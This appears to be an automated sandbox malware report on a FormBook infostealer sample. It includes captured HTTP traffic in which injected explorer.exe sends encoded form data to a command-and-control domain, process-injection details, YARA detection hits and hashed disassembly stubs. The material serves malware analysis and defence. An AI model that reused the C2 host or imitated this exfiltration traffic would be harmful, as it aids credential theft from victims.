                                        Data Ascii: l0GX=lfjemSlLB8ngl3rHIeyXaY4mccNQeDXt0LYwyoUd2_tTTmW1DvSet7WkU_pj5rZ7nXzAW9WpsxfQnMvyJ5QVLhgWUkJj7UdVj_v35JDdBciuSD2Dpnfp1IpmbutdVHuwo_CyTjx89IJymbu9VWV1RaN4dbYp3X9wa8OFBmS0PceWaC~Qp3ePJ0s.
                                        Nov 29, 2022 18:25:32.606645107 CET138INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:11:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.649722154.209.6.24180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:42.914102077 CET141OUTPOST /4u5a/ HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Content-Length: 1454
                                        Cache-Control: no-cache
                                        Origin: http://www.y31jaihdb6zm87.buzz
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.y31jaihdb6zm87.buzz/4u5a/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 6c 30 47 58 3d 6c 66 6a 65 6d 53 6c 4c 42 38 6e 67 6b 58 62 48 4b 5f 79 58 4e 49 34 68 54 38 4e 51 46 7a 58 70 30 4c 55 77 79 70 51 4e 32 4a 4e 54 54 31 75 31 48 39 4b 65 72 37 57 6b 53 5f 6f 72 6b 37 5a 55 6e 58 33 69 57 39 47 35 73 7a 54 51 6d 76 6e 79 43 61 6f 55 44 78 67 55 51 6b 4a 67 37 55 64 41 6a 5f 28 6f 35 4a 48 37 42 63 71 75 53 78 65 44 76 58 66 6d 72 34 70 6d 62 75 74 76 56 48 76 54 6f 37 6e 68 54 6e 38 35 39 61 52 79 6f 66 79 39 51 78 68 79 5a 36 4e 38 55 37 59 34 7a 31 34 53 58 4f 43 41 4a 55 6d 4d 51 65 57 63 59 31 44 75 74 47 61 2d 4b 68 64 6f 56 56 48 4c 4c 37 43 6c 70 5a 51 39 4d 66 38 64 44 48 59 49 52 52 7a 56 70 64 53 33 7e 50 7e 4c 36 71 55 5a 71 4b 4e 67 77 48 38 77 43 34 61 71 59 47 45 7a 34 61 31 36 65 51 44 44 5a 59 46 4c 57 71 36 68 42 65 45 48 47 76 4d 4c 68 65 4f 63 75 51 36 41 4e 31 67 79 57 6a 4b 70 4b 71 78 50 78 70 4b 31 44 77 46 44 67 31 42 46 58 6a 46 6e 6f 31 6a 72 45 46 47 58 6b 58 6f 48 58 70 33 5a 51 62 5a 73 4c 51 31 69 71 57 44 6a 55 34 41 53 42 41 52 6e 6b 32 31 64 4d 43 67 4e 7a 39 45 61 46 67 57 62 67 69 53 53 42 55 4a 59 38 70 57 42 43 79 71 51 6c 66 38 43 44 61 42 39 42 6e 6e 77 36 50 41 78 62 72 67 6c 4a 43 32 42 33 42 28 57 64 38 66 36 51 77 32 6f 42 56 49 46 6e 74 50 77 7e 4c 34 6e 68 7a 71 51 58 50 34 61 78 46 46 32 43 47 4d 54 37 44 6d 72 45 34 42 51 39 4d 31 68 77 43 4a 77 47 65 61 57 61 42 46 72 69 46 51 7a 72 2d 37 58 66 30 7e 6c 55 6b 76 71 6d 6e 75 65 63 6b 51 5f 37 4b 46 77 68 36 4d 64 72 61 76 4d 71 41 61 41 62 7a 4a 79 5a 7a 68 41 61 6a 38 50 67 53 49 63 37 4a 6e 70 49 7a 67 46 4c 30 79 5a 77 6e 7a 65 35 37 4b 50 30 4d 6f 4e 38 5a 52 32 71 32 51 37 7a 49 35 58 4c 62 6a 52 71 44 6b 4d 7a 63 70 55 68 6c 45 43 44 52 61 6a 71 6c 41 49 5a 59 35 63 56 6f 55 58 6d 4f 6b 6a 68 63 77 42 31 38 68 4b 71 49 55 54 73 47 6f 47 67 4e 67 2d 52 74 30 55 51 70 47 64 67 69 43 6b 7e 72 6d 45 57 56 35 62 7e 37 34 59 6f 6c 64 69 68 44 42 38 4f 4f 36 2d 62 35 64 58 72 66 42 51 57 4b 45 74 45 6c 42 77 52 33 70 7a 58 49 45 6b 46 41 7e 48 41 4b 47 44 48 45 73 66 63 79 6a 43 72 7a 61 76 6c 4f 4d 6e 58 41 69 7a 71 53 65 41 35 41 28 4b 41 72 4a 5f 45 74 42 4e 55 38 68 2d 4e 4b 70 62 4b 6c 32 53 47 37 6a 55 31 56 31 4c 31 62 5a 57 76 30 57 41 75 44 38 61 52 6a 46 4a 71 48 41 51 6a 67 34 6f 34 69 4b 4e 6b 7a 69 7a 79 42 42 4d 44 67 39 37 45 47 64 64 4f 68 52 4b 76 7a 30 79 74 77 4b 51 70 39 35 68 6e 76 73 72 64 52 66 4c 77 63 57 41 30 35 34 33 4c 37 41 71 5a 32 49 78 4f 2d 37 41 34 4f 68 46 70 66 42 71 56 56 62 2d 6d 53 32 64 33 31 39 58 33 38 49 76 7a 6d 75 65 65 46 49 62 52 50 34 45 73 67 6e 39 50 44 51 57 6a 71 67 51 76 79 76 6b 74 68 70
                                        Data Ascii: l0GX=lfjemSlLB8ngkXbHK_yXNI4hT8NQFzXp0LUwypQN2JNTT1u1H9Ker7WkS_ork7ZUnX3iW9G5szTQmvnyCaoUDxgUQkJg7UdAj_(o5JH7BcquSxeDvXfmr4pmbutvVHvTo7nhTn859aRyofy9QxhyZ6N8U7Y4z14SXOCAJUmMQeWcY1DutGa-KhdoVVHLL7ClpZQ9Mf8dDHYIRRzVpdS3~P~L6qUZqKNgwH8wC4aqYGEz4a16eQDDZYFLWq6hBeEHGvMLheOcuQ6AN1gyWjKpKqxPxpK1DwFDg1BFXjFno1jrEFGXkXoHXp3ZQbZsLQ1iqWDjU4ASBARnk21dMCgNz9EaFgWbgiSSBUJY8pWBCyqQlf8CDaB9Bnnw6PAxbrglJC2B3B(Wd8f6Qw2oBVIFntPw~L4nhzqQXP4axFF2CGMT7DmrE4BQ9M1hwCJwGeaWaBFriFQzr-7Xf0~lUkvqmnueckQ_7KFwh6MdravMqAaAbzJyZzhAaj8PgSIc7JnpIzgFL0yZwnze57KP0MoN8ZR2q2Q7zI5XLbjRqDkMzcpUhlECDRajqlAIZY5cVoUXmOkjhcwB18hKqIUTsGoGgNg-Rt0UQpGdgiCk~rmEWV5b~74YoldihDB8OO6-b5dXrfBQWKEtElBwR3pzXIEkFA~HAKGDHEsfcyjCrzavlOMnXAizqSeA5A(KArJ_EtBNU8h-NKpbKl2SG7jU1V1L1bZWv0WAuD8aRjFJqHAQjg4o4iKNkzizyBBMDg97EGddOhRKvz0ytwKQp95hnvsrdRfLwcWA0543L7AqZ2IxO-7A4OhFpfBqVVb-mS2d319X38IvzmueeFIbRP4Esgn9PDQWjqgQvyvkthp
                                        Nov 29, 2022 18:25:43.308239937 CET141OUTData Raw: 4f 74 46 78 6f 6d 7a 74 7a 73 35 70 4e 69 4f 52 75 75 38 28 79 6f 32 73 48 4c 41 47 55 52 6e 4a 62 41 68 56 74 57 6a 53 6c 66 56 56 73 58 74 6a 52 48 43 49 66 7e 45 67 74 73 6d 72 6f 32 48 44 32 7a 71 67 35 42 75 52 78 59 31 79 34 6d 41 28 30 6d
                                        Data Ascii: OtFxomztzs5pNiORuu8(yo2sHLAGURnJbAhVtWjSlfVVsXtjRHCIf~Egtsmro2HD2zqg5BuRxY1y4mA(0me6_nCRYhjjloGGGRLpWalEZq3BnAv1_nn7Ymon6OA~qin(J(HzQIZmDSGGmagt37zJf4clX(oquH5hi(zzNIPl4oRQw(QAhr4kqpwOLaH9TV6n7(Fc2HFUkHdidSPRjNSuw~p4UmUcFo6p6836HbuvIcmZ2fMyvVg
                                        Nov 29, 2022 18:25:44.097312927 CET142OUTData Raw: 4f 74 46 78 6f 6d 7a 74 7a 73 35 70 4e 69 4f 52 75 75 38 28 79 6f 32 73 48 4c 41 47 55 52 6e 4a 62 41 68 56 74 57 6a 53 6c 66 56 56 73 58 74 6a 52 48 43 49 66 7e 45 67 74 73 6d 72 6f 32 48 44 32 7a 71 67 35 42 75 52 78 59 31 79 34 6d 41 28 30 6d
                                        Data Ascii: OtFxomztzs5pNiORuu8(yo2sHLAGURnJbAhVtWjSlfVVsXtjRHCIf~Egtsmro2HD2zqg5BuRxY1y4mA(0me6_nCRYhjjloGGGRLpWalEZq3BnAv1_nn7Ymon6OA~qin(J(HzQIZmDSGGmagt37zJf4clX(oquH5hi(zzNIPl4oRQw(QAhr4kqpwOLaH9TV6n7(Fc2HFUkHdidSPRjNSuw~p4UmUcFo6p6836HbuvIcmZ2fMyvVg
                                        Nov 29, 2022 18:25:44.491835117 CET142INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:12:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.649723154.209.6.24180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 29, 2022 18:25:45.330832005 CET143OUTGET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1
                                        Host: www.y31jaihdb6zm87.buzz
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 29, 2022 18:25:45.718872070 CET144INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 29 Nov 2022 17:12:07 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:24:01
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Imagebase:0x12a25d20000
                                        File size:275456 bytes
                                        MD5 hash:4F9C8432B57FA1AA875071DE547BA947
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:18:24:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
                                        Imagebase:0x830000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:18:24:05
                                        Start date:29/11/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff647860000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:10
                                        Start time:18:24:38
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Imagebase:0x1010000
                                        File size:32768 bytes
                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FFCA43F9282 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: b%4
                                          • API String ID: 0-4138019499
                                          • Opcode ID: 32f25da451f8eabd2dfe47d78f96126d23d8bfdcfc2121ed9ef39bc1549b2161
                                          • Instruction ID: 4d5f5d6a15e0cf3f28dfbb3106f4b03b77a5e32a2907d97d7820873cd6f6480a
                                          • Opcode Fuzzy Hash: 32f25da451f8eabd2dfe47d78f96126d23d8bfdcfc2121ed9ef39bc1549b2161
                                          • Instruction Fuzzy Hash: 2D218E74D0A61ECFEB50DFA8D0915ADBBB1FF94300F10467AE41AEB291DA39A941CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F11B1 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: {A]_^
                                          • API String ID: 0-931510603
                                          • Opcode ID: e0b4b8119d8a25dc6809fa6a5dfce76d883755ba7ea6627891ecda55e847c320
                                          • Instruction ID: e3e4239558d465fb353b106ea8d45171ecbefbdced9c5fe92d0f99c2e8d10aa8
                                          • Opcode Fuzzy Hash: e0b4b8119d8a25dc6809fa6a5dfce76d883755ba7ea6627891ecda55e847c320
                                          • Instruction Fuzzy Hash: AE117274A166298FDBA5DF98C8A4AECB7B1FB58700F5041E8D149A7261CB34AD81DF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0180 Relevance: .4, Instructions: 374COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b92a79cd4702004221511599c027b5e6109a11d717543b704ffaa6c17837ece2
                                          • Instruction ID: d0daf29fca29d8a82e419c2233b954c175cd2edec8a483e267e08763a5e0295e
                                          • Opcode Fuzzy Hash: b92a79cd4702004221511599c027b5e6109a11d717543b704ffaa6c17837ece2
                                          • Instruction Fuzzy Hash: EBD17471A1991E8FDF94EB58C8A57F9B3A1FF54300F0046BAC00DE7296DE34A985CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F2263 Relevance: .1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27d728368c0b4d3428b878311f0d1e54b01c133ff767841d112d938d79805883
                                          • Instruction ID: 70c2085cae99bc5858977d0c1cc5d3b6b5e9103f99af6a9b4f799a7ca41f2385
                                          • Opcode Fuzzy Hash: 27d728368c0b4d3428b878311f0d1e54b01c133ff767841d112d938d79805883
                                          • Instruction Fuzzy Hash: D35161A190E7D98FD7528B3488653997FF0AF57210F1A44EBC089DB1A3D5285949C722
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F4850 Relevance: .1, Instructions: 140COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e10acca375c0d7e7f5abdb9633051bbbee4ba17b48ae12329ea60fa4586712c2
                                          • Instruction ID: 6979067bd141e088508f9a5b488ddfb6e9cc1993515c0138107e59387d1755dc
                                          • Opcode Fuzzy Hash: e10acca375c0d7e7f5abdb9633051bbbee4ba17b48ae12329ea60fa4586712c2
                                          • Instruction Fuzzy Hash: B151B17180E7C98FD703CB6488656987FF1AF57310B1945EBC085DB2A3D638A816D761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F2291 Relevance: .1, Instructions: 132COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c927cfd98134107b960d605e6f4f15cb563257733026ebe0e0057bb9cf4e743
                                          • Instruction ID: 61c9e50a76ef0fcfef2de15616cda16a0d05fdbf6eec09d9092b3de8dac50616
                                          • Opcode Fuzzy Hash: 5c927cfd98134107b960d605e6f4f15cb563257733026ebe0e0057bb9cf4e743
                                          • Instruction Fuzzy Hash: 0C41707190E7D98FDB52CB3488653987FF1EF56310F0984EBC449DB1A3DA285945CB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F0088 Relevance: .1, Instructions: 109COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb1dafcd3ccd37cf5f163549743b7ed403a10bb9e20f1cd40f28755114743cdf
                                          • Instruction ID: af14f746b1e14e0afe797f1ab3474f8bff90ab1edd0e3e68a7127d101a7cb75d
                                          • Opcode Fuzzy Hash: cb1dafcd3ccd37cf5f163549743b7ed403a10bb9e20f1cd40f28755114743cdf
                                          • Instruction Fuzzy Hash: A1319C74E09A5D8FEB94DF28C8947E877F1EB88301F0045BAC40DE72A5CA34A8458B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F6D88 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d752d7d2a6b4d060ffbfa80ecabab8eda0cb8242fda2be43c65952978bd9ee01
                                          • Instruction ID: 137836cc9a924a4fe45be13b3b26bbd5c7e80602ac1e6644fcec06b78f25a49a
                                          • Opcode Fuzzy Hash: d752d7d2a6b4d060ffbfa80ecabab8eda0cb8242fda2be43c65952978bd9ee01
                                          • Instruction Fuzzy Hash: 3131B33181D7C94FDB06DF2488619E97FF0EF56300F0905EAE484DB1A3C628A956C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F01A0 Relevance: .1, Instructions: 98COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72aec9b368218829f8b2f80664b4fb7abbcf87aa9da1f12778145900c0b2e8e0
                                          • Instruction ID: 701b1b6c970ce53104c4cc490f8d8521b931651d71c94b63a2aaab7650f8c7de
                                          • Opcode Fuzzy Hash: 72aec9b368218829f8b2f80664b4fb7abbcf87aa9da1f12778145900c0b2e8e0
                                          • Instruction Fuzzy Hash: 5F313C30A0AA4D8FDB84EF58C8906ED73F1FF99300F500579E41AEB295CB35A851CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F3CE3 Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 756f600dfc1ae2e0720e4669f93707d1d2c6c8997520bfbc8189e8df27de8552
                                          • Instruction ID: 1bbad9c5b2daf4d077a288968914bc150f5509671b37984c28a7c1e80ee39882
                                          • Opcode Fuzzy Hash: 756f600dfc1ae2e0720e4669f93707d1d2c6c8997520bfbc8189e8df27de8552
                                          • Instruction Fuzzy Hash: EF419E3080A65DCFDB68DF54C8E46B9B7B1FF85304F1005AED45AAB2A6CB34A842CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFCA43F39FA Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.242074715.00007FFCA43F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA43F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffca43f0000_NHYGUnNN.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18a4d767b469cd72ed352ccf43963422ab917d42a7f3d2d409e68a4d8977e494
                                          • Instruction ID: a3bcc8792677caab05457ff6fbd8e7ac3db93a12cbbaf66b53aed8a3bbe1097f
                                          • Opcode Fuzzy Hash: 18a4d767b469cd72ed352ccf43963422ab917d42a7f3d2d409e68a4d8977e494
                                          • Instruction Fuzzy Hash: E1319E3090AA5D8FDB25DF58C8A46ED7BF1FF99310F0006AAD408EB264CB34A950CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

